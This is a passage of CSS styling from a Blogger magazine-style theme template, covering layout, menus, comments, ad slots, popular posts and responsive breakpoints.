.box-label{background:$(main.color);color: #fff; padding: 6px; font-size: 12px; font-weight:500; line-height: 13px; margin: 0 0 5px 0; display: inline-block; transition: all .3s; border-radius: 5px; }
.box-label:hover{color:#fff;background-color:rgba(236,29,38,1)}
.box-title a {color:#fff;text-shadow: 2px 1px 0 #000;}
.info {position: absolute; bottom: 0; left: 0; width: 100%; height:auto; opacity: 1; transition: all .3s; background: linear-gradient(0deg, rgb(2, 0, 36) 10%, rgba(0, 0, 0, 0) 100%);}
.box-title {display: table-cell; width: 100%; vertical-align: middle; color: #fff; padding: 15px 20px;}
#blog-pager-newer-link{float:left;}
#blog-pager-older-link{float:right;}
.blog-pager,#blog-pager{clear:both;text-align:center;}
#blog-pager-newer-link a,#blog-pager-older-link a{}
a.home-link{font-size:200%;color:#7f939d;transition:all .3s ease-in-out}
a.blog-pager-newer-link,a.blog-pager-older-link,a.home-link{font-weight:400;display:inline-block;width:40px;height:40px;line-height:40px;padding:0;margin:0;transition:all .3s ease-in-out}
#blog-pager-newer-link a,#blog-pager-older-link a{font-size:200%}
#blog-pager-newer-link a:hover,#blog-pager-older-link a:hover,a.home-link:hover,a.home-box:hover,.mobile-desktop-link a.home-link:hover{}
#first-wrapper {overflow: hidden; background:#edf3f5;padding: 40px 0;border-bottom: 1px solid #eee;}
.newphoto {width: 100%; height: 100%; opacity: 0.8;}
iframe#covervideo {width: 100%; height: 468px;border-radius: 10px; box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.55);}
#myvideo {width: 1000px; margin: 0 auto;}
.smoothscroll-top {position:fixed; opacity:0; visibility:hidden; overflow:hidden; text-align:center; z-index:99; background-color:$(main.color);border:1px solid $(main.color); color:#fff; width:47px; height:47px; line-height:40px; right:25px; bottom:-25px; padding-top:2px;transition:all 0.5s ease-in-out; transition-delay:0.2s;box-shadow: 4px 4px 15px rgba(0,0,0,0.1);border-radius:100px; }
.smoothscroll-top:hover {background-color:#fff; color:$(main.color);border:1px solid $(main.color); transition:all 0.2s ease-in-out; transition-delay:0s; }
.smoothscroll-top.show {visibility:visible; cursor:pointer; opacity:1; bottom:25px; }
.smoothscroll-top i.fa {line-height:inherit;}
#footer-section .cloud-label-widget-content .label-size a {background: #0000001f; color: #fff;border-radius:0;}
.cloud-label-widget-content .label-size{display:inline-block;float:left;font-size:10px;line-height:normal;margin:0 5px 5px 0;opacity:1}
.cloud-label-widget-content .label-size a{background: #ffffff; color: #333; float: left; font-weight: 500; line-height: 100%; margin: 0; padding: 10px 8px; transition: all .6s; font-size: 11px; border-radius: 5px; border: 1px solid #ddd;}
.cloud-label-widget-content .label-size a:hover {background:$(main.color);border:1px solid $(main.color);color:#fff; }
.cloud-label-widget-content .label-size .label-count{background:$(main.color);color:#fff;white-space:nowrap;display:inline-block;padding:6px 8px;margin-left:-3px;line-height:normal;border-radius:0 2px 2px 0;font-size:11px;font-weight:600}
.Label li{position: relative; padding: 5px 20px 10px 15px !important; list-style: disc; display: block; font-size: 14px; font-weight: 700;}
.Label li:before{content: "\f061"; font-family: fontAwesome; color: #ccc; font-size: 8px; position: absolute; left: 0; padding: 0; text-decoration: none;}
.Label li a{color:#666}
.Label li:hover:before{color:$(main.color);transition:all .6s}
.Label li span{padding:0 10px;display:block;line-height:20px;position:absolute;right:15px;top:10px;font-size:11px;background:$(main.color);color:#fff;border-radius: 100px;}
.Label li:hover span{background:#FC3931;transition:all .6s}
#adpost2 {margin-bottom:20px;}
.bannerad a{float: right; margin: 25px; padding: 10px 28px;background: #fff;color:$(main.color);border:1px solid $(main.color);border-radius: 100px;}
.bannerad a:hover {background: $(main.color); border:1px solid; font-weight: 500; color: #fff;}
.bannerad .title970{font-weight: 800; font-size: 30px; color: #e5e5e5; float: left; padding: 24px; text-transform: uppercase;}
.bannerad {background: #fff; padding: 0; width: 100%; height: 90px; overflow: hidden; border: 1px solid #ddd;}
.banner300 a{padding: 10px 28px; background: #ffffff; border: 1px solid; border-radius: 100px; font-weight: 500; color: $(main.color);}
.banner300 a:hover {background: #fff;color:$(main.color);border:1px solid 5b95f5}
.banner300 .title970{font-weight: 500; font-size: 24px; color: #333; padding: 28px; text-align: center;margin-top: 40px;}
.banner300{background: #fffcd3; padding: 0; width: 100%; height: 250px; overflow: hidden; text-align: center;border: 1px solid #ddd;}
.avatar-image-container img{height:70px;width:70px;overflow:hidden;float:left;margin-right:20px;max-width:100%!important;border: 2px solid $(main.color); padding: 5px;border-radius: 100px;}
#comments{padding:0!important;background: #fff;-moz-box-sizing: border-box; box-sizing: border-box; overflow: hidden; padding: 15px;}
#comments h4 {padding: 15px; border-bottom: 1px solid #eee; background: #f9f9f9;}
.comments {margin-top:0!important;}
.comment-footer { margin: 0!important; }
.comment-form {padding: 20px!important;;}
#comments a {font-family: 'Poppins', sans-serif;font-size:13px;font-weight:500;color:#444}
.comments .avatar-image-container{max-height:100%!important;width:70px!important;margin-right:10px;border-radius:3px;overflow:initial;margin-right:20px;}
.comment-block{border-bottom:1px solid #ecedee;margin-bottom:20px;padding-bottom:20px;overflow:hidden;position:relative}
.comment-header a{font-size:14px;font-style:normal;display:inline-block;margin-bottom:5px;color:#34495E; font-family: 'Poppins', sans-serif;}
.comments .comments-content .datetime a{font-size:11px;font-weight:600;font-family:'Poppins', sans-serif;}
.comments .comments-content .datetime,.comments .comment .comment-actions a{float:right}
.comment-actions a:hover{background:$(main.color);color:#fff!important;text-decoration:none}
.comment-actions a{color:$(main.color);background:#fff;border:1px solid #ddd;float:right;font-size:13px;padding:5px 20px!important;margin-left:10px;font-weight:600;border-radius:3px;font-family:'Poppins', sans-serif;}
.comments .comments-content .comment-header{background: #f9f9f9; padding: 5px; margin-bottom: 0; border: 1px solid #eee;}
.comments .comment .comment-actions a{padding:0;}
.comments .comment .comment-actions a:hover{text-decoration:none}
.comments .continue{cursor:pointer;margin-top:-30px;margin-bottom:30px}
.comments .continue a{display:block;color:#333;font-size:11px;font-weight:normal;padding:0}
.comments .comments-content .icon.blog-author{height:initial;width:initial;margin:0 0 -4px 12px;font-weight:700;color:#FFFFFF;font-size:11px;background:$(main.color);padding:3px;border-radius:3px}
.comments .comments-content .icon.blog-author:after{content:"Admin"}
.comments .comments-content .comment-content{text-align: left; padding: 20px; background: #fff; color: #232323; border: 1px solid #eee; border-top: 0; font-family: 'Poppins', sans-serif; font-weight: 400; font-size: 14px; box-shadow: 0 2px 8px rgba(0,0,0,0.05); margin-bottom: 20px;}
.comments .comments-content {padding: 15px; padding-top: 0;padding-bottom: 0;}
.deleted-comment{font-style:italic;color:gray}
.comment-form { padding: 0; }
.mmmscredit{line-height:normal;margin:10px;color:#333;font-size:12px;font-weight:500}
.mmmscredit a {color:$(main.color);text-decoration:none;font-weight:600}
.mmmscredit a:hover {color:#f17c72;text-decoration:none;}
]]></b:skin>
<b:template-skin>
body#layout div.section {background-color:transparent;border:0;font-family:sans-serif;margin:0;overflow:visible;padding:0;position:relative}
body#layout .top-tab-widget-menu ul,body#layout ul,#layout ul,body#layout div.section h4,#layout div.section h4 {display:none;}
body#layout .draggable-widget .widget-wrap2 {background: #dd3333 url(https://www.blogger.com/img/widgets/draggable.png) no-repeat 4px 50%;}
body#layout .add_widget {background-color:#dd3333;border: 1px dashed #3a3a3a!important;}
body#layout .add_widget a {color: white}
body#layout .editlink {color: #fff !important; background-color: #dd3333; padding: 0px 20px; border-radius: 50px;}
body#layout #footer-sgwidget .footer-widget {margin-left:0;margin-right:20px;width: 30.2%; float: left;}
body#layout #featuredpost {display:none;}
body#layout #header {width:95%;margin:4px;float:left;background-color: #fff; padding:10px!important; border: 1px solid #dd3333; margin-bottom: 10px;}
body#layout #header:before {content: "Header"; font-size: 14px; color: #484848; display: inline-block; font-family: sans-serif; font-weight: 600;margin-bottom: 10px;}
body#layout #header-right {width:62%;margin:4px;background-color: #fff; padding:10px!important; border: 1px solid #dd3333; margin-bottom: 10px;float:right;}
body#layout #header-right:before {content: "Header ad slot (728x90 px )";font-size: 14px; color: #484848; display: inline-block; font-family: sans-serif; font-weight: 600;margin-bottom: 10px;}
body#layout #recent1 {width:95%;margin:4px;background-color: #fff; padding:10px!important; border: 1px solid #dd3333; margin-bottom: 10px;}
body#layout #recent1:before {content: "Mag Wrapper (Add unlimited widget)"; font-size: 14px; color: #484848; display: inline-block; font-family: sans-serif; font-weight: 600;margin-bottom: 10px;t: 700;}
body#layout #featured-wrapper {width:95%;margin:4px;background-color: #fff; padding:10px!important; border: 1px solid #dd3333; margin-bottom: 10px;}
body#layout #featured-wrapper:before {content: "Top of the week"; font-size: 14px; color: #484848; display: inline-block; font-family: sans-serif; font-weight: 600;margin-bottom: 10px;t: 700;}
body#layout #adpost2 {width:95%;margin:4px;background-color: #fff; padding:10px!important; border: 1px solid #dd3333; margin-bottom: 10px;}
body#layout #adpost2:before {content: "Responsive Ad slot"; font-size: 14px; color: #484848; display: inline-block; font-family: sans-serif; font-weight: 600;margin-bottom: 10px;t: 700;}
body#layout #sidebar {margin:4px;float:right;background-color: #fff; padding:10px!important; border: 1px solid #dd3333; margin-bottom: 10px;}
body#layout #sidebar:before {content: "Sidebar";font-size: 14px; color: #484848; display: inline-block; font-family: sans-serif; font-weight: 600;margin-bottom: 10px;}
body#layout #Blog1 {margin: 4px; background-color: #fff; padding: 10px !important; border: 1px solid #dd3333; margin-bottom: 10px; width: 67%; float: left;}
body#layout #Blog1:before {content: "Main Blog";font-size: 14px; color: #484848; display: inline-block; font-family: sans-serif; font-weight: 600;margin-bottom: 1}
</b:template-skin>
<b:if cond='data:blog.url == data:blog.homepageUrl'>
<style type='text/css'>
#post-wrapper { float: left; width: 100%; padding: 0; }
#sidebar-section, #main {display:none;}
</style>
</b:if>
<style type='text/css'>
/*========================== CSS Breaking News ==========================*/
#breakingnews {margin-right:15px;height:42px;line-height:29px;overflow:hidden;width:30%;float:left;}
#breakingnews .breakhead {position: absolute; color: #333; display: block; float: left; font-family: 'Poppins', sans-serif; font-size: 12px; font-weight: 600; padding: 7px 22px;}
#adbreakingnews li a {font-weight: 500; color: #333; transition: all 0.5s ease-in-out; font-family: 'Poppins', sans-serif; font-size: 12px;}
#adbreakingnews {float: left; margin-left: 110px; margin-top:9px;}
#adbreakingnews ul,#adbreakingnews li{list-style:none;margin:0;padding:0}
.play-button, .overlayb {position: absolute;top: 48px;right:85px;color:#fff;text-transform: uppercase;font-size:25px; transition: all .3s ease-out;}
.overlayb:after {content: "\f04b";}
.fa-play {background: rgba(0, 0, 0, 0.75); padding: 10px 17px; border-radius: 100%; padding-right: 10px;border: 2px solid #fff}
.play-button:hover {color: rgb(255, 24, 24); transition: all .3s ease-out;}
.play-button:hover .fa-play {color: rgb(255, 24, 24); transition: all .3s ease-out;border:2px solid}
.header-right {float:right;padding:0;overflow:hidden;margin:0;width:100%;max-width:728px;}
.header-right img {display:block;float: right;}
.widget ul {line-height:1.4em;}
#Attribution1,#navbar-iframe,#BlogArchive1_ArchiveList ul li:before,#ContactForm1,#ContactForm1 br{display:none!important;height:0;visibility:hidden;width:0}
#slider-box {width:95.5%;float:left; margin-bottom: 15px;}
/*========================== Home Box Styling ==========================*/
.more-link {background-color: rgba(110, 110, 110, 0.16); border: 1px solid rgba(192, 192, 192, 0.34);}
#outer-wrapper{max-width:1150px;margin:0 auto;overflow:hidden;}
#content-wrapper {background-color:#fff;margin:20px auto;padding:0;word-wrap:break-word;}
.topbar-wrapper {background:#fff;position:relative;z-index:96;overflow:hidden;margin:0 auto;border-bottom: 1px solid #eee;}
.top-wrappers {padding:0;position:static;margin:0 auto;}
.header2 {margin:0 auto;padding:0;max-width:1150px;}
.top-gridnav {display:block;margin:0 auto;float:left;padding:0;width:100%;background:transparent;border:none;}
.top-gridnav ul {width:100%;padding:0;margin:0;text-align:left;}
.top-gridnav li {list-style-type:none;float:left;padding:0;margin:0;}
.top-gridnav li a {position:relative;font-family:'Poppins', sans-serif;font-size:14px;font-weight:400;background-color:transparent;color:#7f939d;display:block;margin:0;padding:8px 2px;line-height:100%;transition:color 0.3s;}
.top-gridnav ul li a:active, .top-gridnav ul li.highlight a {line-height:100%;text-decoration:none;}
.top-gridnav ul li a:hover {color:#F7F7F7;text-decoration:none;}
.top-gridnav li.sosmed {float:right;}
.top-gridnav li.sosmed a i{text-align:center;color:#FFFFFF;transition:initial;}
.top-gridnav li.sosmed a:hover,.top-gridnav li.sosmed a:hover i{color:#F7F7F7;}
.top-gridnav a#pull {display:none;}
.top-social-wrapper .social-icon{ float: left; margin-left:20px; max-width: 14px; }
.top-social-wrapper .social-icon:first-child{ margin-left: 0px; }
.top-social-wrapper .social-icon a:hover{ opacity: 1; filter: alpha(opacity=100); }
.social-icon .fa {font-size:12px;color:#333;}
.top-navigation-right {float: right; margin: 13px;}
.recpost .arl-tmb{float:left;margin-right:10px}
.recpost .post-panel{margin-left:70px}
.recent-date:before{margin-right:5px}
.recent-author:before{margin-right:5px}
.recent-author{margin-left:10px}
.recpost li:first-child{padding-top:0}
.recpost li:last-child{border-bottom:none}
.recpost .arl-tmb{display:block;width:60px;height:60px;}
.recpost .rcp-title{font-size:15px;font-weight:600;text-overflow: ellipsis; white-space: nowrap; overflow: hidden;}
.recpost .rcp-title a{color:#fff;font-weight:500;font-size:14px}
.recpost .rcp-title a:hover{color:#4791d2;text-decoration:none}
.recent-date:before{content:'\f017';font-family:fontawesome;color:#fff}
.recent-date{color:#fff;font-weight:600;font-size:11px}
.recent-author:before{content:'\f007';font-family:fontawesome;color:#fff}
.recent-author{color:#fff;font-weight:600;font-size:11px}
/*========================== CSS Header Wrapper ==========================*/
#header h1,#header h2,#header p{display:inline-block;font-size:28px;font-weight:800;color:#333;line-height: 1;margin: 20px 10px 0;}
#header a:hover{color:#ff675c}
#header a {color:#46515e;text-decoration:none;transition:all 0.3s ease-in-out;}
#header a:hover {color:#88B922;}
#header .description {font-size:100%;font-weight:400;color:#5b686a;text-transform:none;margin: 10px;}
.header img {display:block;margin-top:15px;}
.header-right {float:right;padding:0;overflow:hidden;margin:0;width:100%;max-width:728px;}
.header-right img {display:block;float: right;}
/*========================== CSS Main Menu ==========================*/
#menu {display:block;}
#nav{font-weight: 500; margin: 0 auto; font-size: 13px;float: right;}
#menubar {margin: 0 auto;display: inline-flex;}
.menu-nav {list-style:none;margin:0 0 0 0;float:left;}
.menu-nav:before,.menu-nav:after {content: " ";display:table;}
.menu-nav:after {clear:both;}
.menu-nav ul {list-style:none;margin:0 0 0 0;width:12em;}
.menu-nav a {display:block;padding:0 15px;}
.menu-nav li {position:relative;margin:0 0;}
.menu-nav > li {float:left;}
.menu-nav > li > a {display: block; height: 60px; line-height: 60px; color: #333; text-transform: uppercase; font-weight: 600; letter-spacing: 0.3px; font-size: 13px;}
.menu-nav li ul {display:block;position:absolute;left:0;z-index:10;visibility:hidden;opacity:0;box-shadow:0 0 5px rgba(0,0,0,0.1);transition:initial;border-radius: 5px;}
.menu-nav li li ul {left:100%;top:-1px;}
.menu-nav > li.hover > ul {visibility:visible;opacity:1;}
.menu-nav li li.hover ul {visibility:visible;opacity:10;}
.menu-nav li li a {display:block;color:#333;position:relative;z-index:100;text-transform:none;height:46px;line-height:46px;font-weight:400;transition:initial;}
.menu-nav li li li a {background:#313541;z-index:20;color:#fff;}
.menu-nav li:hover .parent:after{color:#333;}
.menu-nav li ul li .parent:after {content: "\f0da";font-family:FontAwesome;font-style:normal;font-weight:normal;text-decoration:inherit;padding-left:6px;color:rgba(255,255,255,0.5);float:right;}
.menu-nav li ul li .parent:hover:after {color:rgba(255,255,255,1);}
.menu-touch {display:none;background:rgba(0, 0, 0, 0.12);;padding:0 15px;height:60px;line-height:60px;color:#fff!important;}
.menu-touch:hover {background:rgba(0, 0, 0, 0.12);;}
#search-form{float:right;margin:0;max-width:250px}
#search-form table {width:100%;margin:0;}
td.search-box{position:relative;overflow:hidden;height:42px;line-height:42px}
#search-form input#search-box[type="text"]{background: #fff; line-height: 40px; margin: 10px; padding: 0 20px; color: #000; transition: all .55s; border-radius: 60px; border: 1px solid #eee; font-family: 'Poppins', sans-serif;}
#search-form input#search-box[type="text"]:focus {background:rgba(255,255,255,1);color:#7f939d;outline:none;}
#search-form input#search-button[type="submit"]{position: absolute; top: 0; right: 8px; display: inline-block; font-family: FontAwesome; background: transparent; color: rgb(0, 0, 0); margin: 0; padding: 24px 25px; border: none; outline: none; transform: rotate(0deg); transition: all .55s;}
#search-form input#search-button[type="submit"]:hover{color:#f17c72;cursor:pointer;}
/*========================== CSS Post Wrapper ==========================*/
.post {margin:0;padding:15px;}
.post-body{line-height:1.8em;margin:auto;max-width:100%}
.post-body img {max-width:100%;margin:10px auto;height:auto;}
h3.post-title a,h2.post-title a,h1.post-title a,h3.post-title,h2.post-title,h1.post-title{padding:0;margin:15px auto;text-align:left;font-size:18px;}
h3.post-title a:hover,h2.post-title a:hover,h1.post-title a:hover{color:#f17c72;}
.author-info, .time-info, .review-info {margin-right:8px;display:block;color:#414042;}
.author-info {margin-bottom:5px;float:left;}
.post-information i {color:#c8cdd1;}
.timestamp-link abbr {border-bottom:none;text-decoration: none;}
#blog-pager-newer-link{float:left;}
#blog-pager-older-link{float:right;}
.blog-pager,#blog-pager{clear:both;text-align:center;margin:50px auto 30px auto;}
.feed-links{clear:both;line-height:2.5em;}
span.post-author.vcard {visibility:hidden;width:0;height:0;}
.post-header, .post-footer {line-height:initial;width:0;height:0;}
#sidebar-section {opacity:0;visibility:hidden;width:0;height:0;}
#footer-section{text-align: center;padding: 0;margin-top: 30px;border-top: 1px solid #eee;}
#footer-sgwidget .footer-widget {width:30.2%;float:left;padding-top:10px;padding-bottom:15px;}
#footer-sgwidget {overflow:hidden;}
#footer-section h2 {font-size: 15px; font-weight: 700; text-transform: uppercase; margin-bottom: 0; color: #fff; padding: 10px 0; position: relative; text-align: left; border-bottom: 3px solid; border-style: double; }
#footer-section .widget-content {text-align:left;margin:10px 0;color:#fff;}
#footer-section .widget-content li {color:#fff}
#footer-section .widget li {display: block; margin-bottom: 15px;}
#footer-section #footer3 li {margin-bottom:0;}
#footer3 .Label li:before {color:#fff;}
.footer li a {padding-top:0;padding-right:0;font-size:15px;font-weight:700;color:#fff;margin:0}
.footer li a:hover {color:#fff;}
.footer {font-weight:400;padding-bottom:.2em;}
.footer-bottom {min-height:40px;width: 1150px; margin: 0 auto;}
#footx1,#footx2,#footx3 {margin-right:30px;}
#footer-credit{background:#fff;position:relative;display:block;padding:5px;}
/*========================== CSS Popular Post ==========================*/
.PopularPosts ul,.PopularPosts li,.PopularPosts li img,.PopularPosts li a,
.PopularPosts li a img {margin:0;padding:0;list-style:none;border:none;
background:none;outline:none;}
.PopularPosts ul {margin:0;list-style:none;}
.PopularPosts ul li img{display: block; margin-right: 10px; width: 130px; height: 160px; float: left; transition: all .5s ease-out;}
.PopularPosts ul li img:hover {background:#fff;opacity:0.9;}
.PopularPosts ul li{position: relative; transition: all .3s ease-out;}
.PopularPosts ul li:last-child {border-bottom:none;margin-left:0;padding-bottom:0}
.PopularPosts ul li a:hover {color:#EE8F04!important;}
.PopularPosts ul li .item-title a, .PopularPosts ul li a {font-weight:700;color:#444444;text-decoration:none;transition:all 0.3s ease-out;line-height: 1.6;}
.PopularPosts ul li .item-title a:hover, .PopularPosts ul li a:hover {color:#EE8F04;text-decoration:underline}
.PopularPosts ul li:before {display:none;list-style:none;}
.PopularPosts ul li:first-child > a:before {content:"hot";font-size:10px;font-weight:400;padding:0 4px;border-radius:2px;color:#fff;background:#f0b26f;display:inline-block;position:absolute;right:0;top:0;padding-top:0}
.PopularPosts .item-thumbnail {margin:0;}
.PopularPosts .item-snippet {font-size: 13px; color: #555; font-weight: 400; margin-top: 10px;}
.profile-img{display:inline;opacity:1;margin:0 6px 3px 0;}
.PopularPosts .item-title {padding-bottom:.2em;padding:0;}
.PopularPosts ul{margin:0;list-style:none;color:#64707a}
.PopularPosts ul li{position:relative;background-color:#fff;margin:0;padding:.7em 0!important;border:0;position:relative;border-bottom:1px dotted rgba(0,0,0,0.2)}
.PopularPosts ul li:before{font-family:fontawesome;content:'\f005\f005';display:inline-block;position:absolute;color:#f39c12;text-align:center;bottom:0;right:0;margin:9px 0;font-size:11px;padding:0;font-weight:normal;line-height:normal;transition:all .3s}
.PopularPosts ul li:nth-child(1):before{font-family:fontawesome;content:'\f005\f005\f005\f005\f005';}
.PopularPosts ul li:nth-child(2):before{font-family:fontawesome;content:'\f006\f005\f005\f005\f005';opacity:.9}
.PopularPosts ul li:nth-child(3):before{font-family:fontawesome;content:'\f006\f006\f005\f005\f005';opacity:.85}
.PopularPosts ul li:nth-child(4):before{font-family:fontawesome;content:'\f006\f006\f006\f005\f005';opacity:.8}
.PopularPosts ul li:nth-child(5):before{font-family:fontawesome;content:'\f006\f006\f006\f006\f005';opacity:.75}
.PopularPosts ul li:hover:before{opacity:1}
/*========================== CSS Blog Navigation ==========================*/
.mobile-desktop-link a.home-link{font-size:0;font-weight:400;background:0 0;padding:0;width:0;height:0;border:0;}
a.home-link {display:none}
.banner,.banner2 {margin:0 auto;text-align:center;overflow:hidden;}
.banner .widget,.banner2 .widget {width:100%;max-width:100%;margin:0 auto;background:transparent;text-align:center;overflow:hidden;padding-top:15px;padding-bottom:15px;}
.banner img, .banner iframe,.banner2 img, .banner2 iframe{display:block;margin:20px auto;text-align:center;}
/*========================== CSS Responsive Design ==========================*/
@media screen and (max-width:1066px) {
#outer-wrapper {margin:0 auto;}
#sidebar-section {margin-right:0!important;}
#menubar, #header-wrapper, .footer-bottom {width:100%}
#recent1 .widget-content {overflow: hidden; overflow-x: scroll; overflow-y: hidden; width: 100%;}
#recent1 .widget {overflow: hidden; height: 435px;}
#HTML1 .widget-content {overflow-x: initial; overflow-y: initial;}
.widget#HTML1 {height:auto;}
#label_with_thumbs { margin: 0; padding: 0; position: relative; width: 1150px; }
}
@media screen and (max-width:960px) {
#menubar {display:initial;}
.featured-post, #myvideo {width:100%;}
.featured-post h2 {color: #333; font-size: 20px; text-transform: uppercase; padding-bottom: 10px; line-height: 45px; font-weight: 700; letter-spacing: 1px; text-align: center; }
.heading-underline:before, .heading-underline:after {background: #333;}
.heading-underline {margin-bottom:20px;background: #333}
#featured-wrapper {overflow:hidden;background: #edf3f5; padding: 15px; padding-top: 10px;height: 465px;}
#first-tmb .widget-content {overflow: hidden; overflow-x: scroll; overflow-y: hidden; width: 100%;}
#outer-wrapper {margin:0 auto;border:none;}
#content-wrapper {background:none;}
.header img {margin: 0 auto;width: 280px;}
#header h1,#header p,#header,.header-right,#header .description{margin:0 auto;width:100%;float:none;text-align:center;}
#header {padding:10px 20px;background:transparent;}
.header-right img, .header-right iframe{margin:0 auto;max-width:100%;}
#header-wrapper{padding:0;margin:auto;}
#sidebar-section{width:27%}
#blog-pager {margin-bottom:15px!important;}
iframe#covervideo {height:300px;}
}
@media only screen and (max-width:768px){
.post-outer {margin:0;}
#content-wrapper {padding:0;}
h3.post-title a, h2.post-title a, h1.post-title a, h3.post-title, h2.post-title, h1.post-title,.post-information,.post-information span {text-overflow:initial;white-space:normal;overflow:visible;width:initial}
#recent1 .title {margin-top: 0; margin-bottom: 15px;}
<b:if cond='data:blog.url == data:blog.homepageUrl'>
h2.post-title, h1.post-title, h2.post-title a, h1.post-title a, h2.post-title, h1.post-title {clear:both;text-overflow: ellipsis;white-space: nowrap;overflow: hidden;}
</b:if>
.post {padding:0 10px 30px 10px;}
.post-body {text-overflow:ellipsis;visibility:visible;width:initial;height:initial;opacity:1;padding:0;}
#outer-wrapper { margin: 5px; margin-top:0;margin-bottom:0;padding:5px; padding-top:0; padding-bottom:0;}
.topbar-wrapper {margin:0;}
.top-wrappers {margin:0;text-align: center;}
#nav {margin:0;padding:0 20px;border-bottom:0;border-top:0;float:left;background:#ff4444; width: 100%;}
.menu-nav > li > a {color:#fff;}
.menu-nav > li > a.active {border-top:4px solid #f17c72;color:#fff;}
.menu-nav > li:hover > a, .menu-nav > li > a.active:hover {color:#fff;}
.nav-plus li ul:before {display:none;}
.nav-plus > li {float:none;overflow:hidden;}
.nav-plus ul {display:block;width:100%;float:none;}
.menu-nav li ul {background:#373b47;box-shadow:none;}
.menu-nav li ul li a{color: #fff;}
.menu-nav li li a:hover {background:#f17c72;}
.menu-nav > li > a.active{padding:0 15px;}
.nav-plus > li.hover > ul , .nav-plus li li.hover ul {position:static;}
.menu-nav li .parent:after,.menu-nav li ul li .parent:after {content: "\f0d7";font-family:FontAwesome;font-style:normal;font-weight:normal;text-decoration:inherit;padding-right:5px;float:right;color:#fff;}
.menu-nav li:active .parent:after,.menu-nav li ul li:active .parent:after {background:#fff;}
#search-form {width:100%;margin:0!important;float:none}
#search-form table{width:100%;margin:20px 0;background:#f6f6f6;border-radius:5px}
#search-form td.search-box {padding:0 10px!important;}
#search-form td.search-button {padding:0 10px;width:1%;}
#search-form input#search-box[type="text"] {width:100%;margin:0;background:#f6f6f6;color:#666;}
#search-form input#search-button[type="submit"]{margin:0 0 0 -6px;padding:14px 25px;color:#7f939d}
#search-form input#search-box[type="text"]:focus {background:#f6f6f6;outline:none;}
#header a:before,#header a:after{display:none;}
#post-wrapper {width:100%;max-width:100%;margin:20px auto;}
.post-body img {max-width:90%;}
.sidebar-inner, .post-inner {padding:0;}
.mmmscredit {float:none;text-align:center;margin:10px auto;}
#slider-box, .most-viewed2 {display:none;}}
@media only screen and (max-width:640px){
#breakingnews {display:none;}
.topbar-wrapper {margin:0 auto;}
#header h1,#header h2,#header p,#header .description{font-size:200%;margin:0 auto 10px;width:100%;float:none;text-align:center;letter-spacing:1px;}
#header-wrapper{padding:0;margin:auto;}
#header {min-width:initial;background:none;}
#header .description {margin:0 auto;width:100%;float:none;text-align:center;font-size:90%;line-height:1.5;text-transform:none;letter-spacing:0;}
#footer-section{margin:20px 0 0 0;}
#footer-sgwidget {width:100%;overflow:hidden;}
#footer-sgwidget .footer-widget{display:block;clear:both;width:92%;float:none;margin-left:0;margin:0 auto 10px}
.responsive-menu {margin:0;}
.pvid ul li{width:49%;display:inline-block;overflow:hidden;margin-right:10px;}
.pvid ul li:nth-child(2n),.pvid ul li:nth-child(4n),.pvid ul li:nth-child(6n) {margin-right:0}
.pvid ul li{float:left}
.post-information3 { float: none!important; text-align: center; }
.label-info a {margin: 5px!important;display: inline-block;}
}
@media only screen and (max-width:480px){
.top-gridnav { display: -webkit-inline-box; margin: 0 auto; width: initial; text-align: center; float: none; }
.top-navigation-right { float: none; margin: 13px; }
.top-gridnav li {display:block;width:100%;text-align:left;border-right:none;}
.post {margin:0 0 8px;padding:0!important;margin-right:0!important;}
.more-link {display:none;}
.box-title h2 a, .box-title10 h2 a {font-size:initial!important;}
.pvid ul li{width:100%;display:inline-block;overflow:hidden;}
.recent-block .recent-thumb {height:180px;}
.pvid ul li .recent-thumb:before {height:180px;line-height:180px;}
.post-outer {width:100%!important;}
.play-button, .overlayb {top: 68px!important; right: 135px!important;}
iframe#covervideo { width: 100%; height: 200px; }
.post-information2 {float:left!important;}
ul#related-summary li {margin-bottom:10px!important;width: auto!important;}
@media screen and (max-width:320px){}
</style>
<b:if cond='data:blog.pageType == "item"'>
<style type='text/css'>
#post-wrapper {float:left;width:70%;padding:0;bottom: 40px;border: 1px solid #eee; border-radius: 7px;}
.post-body img { margin: 0 15px 0 0; }
.post {padding:0!important;}
.post-body { background: #fff; overflow: hidden; padding: 15px;font-size: 14px; border-bottom: 1px solid #eee;}
h3.post-title a,h2.post-title a,h1.post-title a,h3.post-title,h2.post-title,h1.post-title{color:#414042; float: left;margin:0;font-size: 20px; font-weight: 800;margin-bottom: 6px;}
.authorAvatar img{width:50px;height:50px;border-radius:100px;}
.authorAvatar {float: left; margin-right: 10px;box-shadow: 0 2px 8px rgba(0,0,0,0.05);}
.mt-card {background: #fff; overflow: hidden; padding: 15px;border-bottom: 1px solid #eee;}
.post-share-url {display:block;width:100%;box-sizing:border-box;padding:10px;margin-top:10px;border:1px solid #ccc;font-size:14px;outline:0;-o-border-radius:2px;-ms-border-radius:2px;-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;font-weight: 600; color: #525252;}
.post-information{margin: auto; font-size: 14px; color: #414042;float: left; display: inline-table;}
.post-information2{margin: auto; font-size: 13px; color: #414042;margin-top:7px;display:inline-block;}
.post-information3 {float:right;}
.post-information a {display:inline;background:transparent;color:#333;transition:all .3s ease-out;font-weight:600}
.post-information a:hover {color:#f17c72;text-decoration:underline;}
.post-information2 a {display:inline;background:transparent;color:#333;transition:all .3s ease-out;font-weight:600}
.post-information2 a:hover {color:#f17c72;text-decoration:underline;}
img.author-photo{height:22px;width:22px;border-radius:100%;margin:0 3px 0 0}
.authorboxwrap{background: #fff; padding: 20px; overflow: hidden;border-bottom:1px solid #eee;border-top:0}
.avatar-container {float:left;margin-right:20px;}
.avatar-container img{width: 150px; height: auto; max-width: 100%!important; border-radius: 100%;}
.author_description_container h4{font-weight:700; font-size:17px; display: block; margin: 0; margin-bottom: 8px;}
.author_description_container h4 a{color:#333}
.author_description_container p{margin:0;color:#333;font-size:13px;margin-bottom:8px;line-height:25px;font-weight:400;}
.social-links li {list-style:none !important;float: left;}
.social-links a {border-bottom: none;}
.social-links a:after, .social-links a:before{content: none!important;}
.social-links i {background: #f0f0f0; color: #787878; font-size: 17px; text-align: center; display: inline-block; padding: 7px 25px; margin: 0px 3px;border-radius:3px;}
.social-links i:hover {background:$(main.color); color: #fff; transition: all ease .3s; }
.author-box .avatar{margin-left: 2.4rem; float: right !important; border: 2px solid #F0F0F0; padding: 2px; }
</style>
</b:if>
<style type='text/css'>
.post {margin:0;padding:20px;border-bottom:0;border-top:0;}
